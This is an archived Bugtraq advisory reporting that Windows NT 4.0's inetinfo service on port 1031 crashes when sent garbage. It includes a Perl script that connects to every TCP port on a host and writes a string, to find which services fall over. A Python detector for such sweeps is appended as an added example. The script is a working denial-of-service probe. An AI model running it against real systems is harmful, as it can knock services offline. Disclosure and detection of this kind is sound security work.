Bugtraq archives for 3rd quarter (Jul-Sep) 1998: [NTSEC] NT vulnerable to DOS attack on more than just port 135

[NTSEC] NT vulnerable to DOS attack on more than just port 135

Bob Beck (beck@obtuse.com)
Sat, 25 Jan 1997 12:06:11 -0600

        Looks like NT is also vulnerable to exactly the same attack as
previously posted WRT connecting and throwing garbage at port 135, on
another port, namely 1031 (inetinfo). The inetinfo.exe process goes
insane on NT 4.0. Haven't tested on 3.51.  To try, telnet to 1031 on an
NT machine and type garbage, then disconnect.

        Below is what Chris Bayly (Chris.Bayly@ualberta.ca) and I rigged up to
check.

        -Bob

---------------------------------------------------------------------------
Bob Beck                                         Obtuse Systems Corporation
beck@obtuse.com                                  http://www.obtuse.com/
True Evil hides its real intentions in its street address. Search and you
shall find it, and the truth shall set you free.


------------------------------8<----------------------------------
#!/usr/local/bin/perl
# Connects to each TCP port on the named host in turn, writes a short
# string and disconnects, to see which services fall over.  open_port,
# print and close come from chat2.pl, the old Perl 4 chat library.

use Socket;
use FileHandle;
require "chat2.pl";

$ILoveBill = shift @ARGV or die "usage: $0 host\n";

$verbose = 0;     # tell me what you're hitting
$knownports = 0;  # set to 1 to skip the ports already known to be a problem
# The original read "$port = $0", which is the script name, not zero.
for ($port = 1; $port <= 65535; $port++)
{
  if ($knownports && ($port == 135 || $port == 1031)) {
      next;
  }
  $fh = chat::open_port($ILoveBill, $port);
  next unless $fh;    # connect failed or nothing listening on this port
  chat::print($fh, "Windows NT is the platform of the future");
  if ($verbose) {
          print "Trying port: $port\n\n";
  }
  chat::close($fh);
}
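From the defender's side, the traffic the script above generates is easy to spot: one source walking a host's ports in sequence, each connection carrying a few bytes, plus hits on the two ports the post names. The following detector is an added example, not part of the original post or Bob Beck's code; it runs over a constructed connection log in a made-up "timestamp src dst dport bytes" format and flags both patterns.

```python
import re
from collections import defaultdict

# Ports the post identifies as crashing NT when sent garbage.
WATCHED_PORTS = {135, 1031}

# Constructed sample log (not real data): 10.0.0.7 sweeps ports 130-159
# on one host, 10.0.0.9 makes a normal web request, 10.0.0.11 pokes 1031.
SAMPLE_LOG = "\n".join(
    f"1997-01-25T12:06:{i:02d} 10.0.0.7 192.168.1.20 {port} 40"
    for i, port in enumerate(range(130, 160))
) + "\n1997-01-25T12:07:00 10.0.0.9 192.168.1.20 80 512" \
  + "\n1997-01-25T12:08:00 10.0.0.11 192.168.1.20 1031 60\n"

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\d+)$")


def parse_log(text):
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, dst, dport, nbytes = m.groups()
        events.append({"ts": ts, "src": src, "dst": dst,
                       "dport": int(dport), "bytes": int(nbytes)})
    return events


def detect(events, sweep_threshold=20):
    """Return alerts as tuples.

    'watched-port': any connection to 135 or 1031.
    'port-sweep':   a (src, dst) pair touching >= sweep_threshold distinct
                    destination ports, which is what the posted script does.
    """
    alerts = []
    ports_seen = defaultdict(set)
    for e in events:
        if e["dport"] in WATCHED_PORTS:
            alerts.append(("watched-port", e["src"], e["dst"], e["dport"]))
        ports_seen[(e["src"], e["dst"])].add(e["dport"])
    for (src, dst), ports in sorted(ports_seen.items()):
        if len(ports) >= sweep_threshold:
            alerts.append(("port-sweep", src, dst, len(ports)))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert)
```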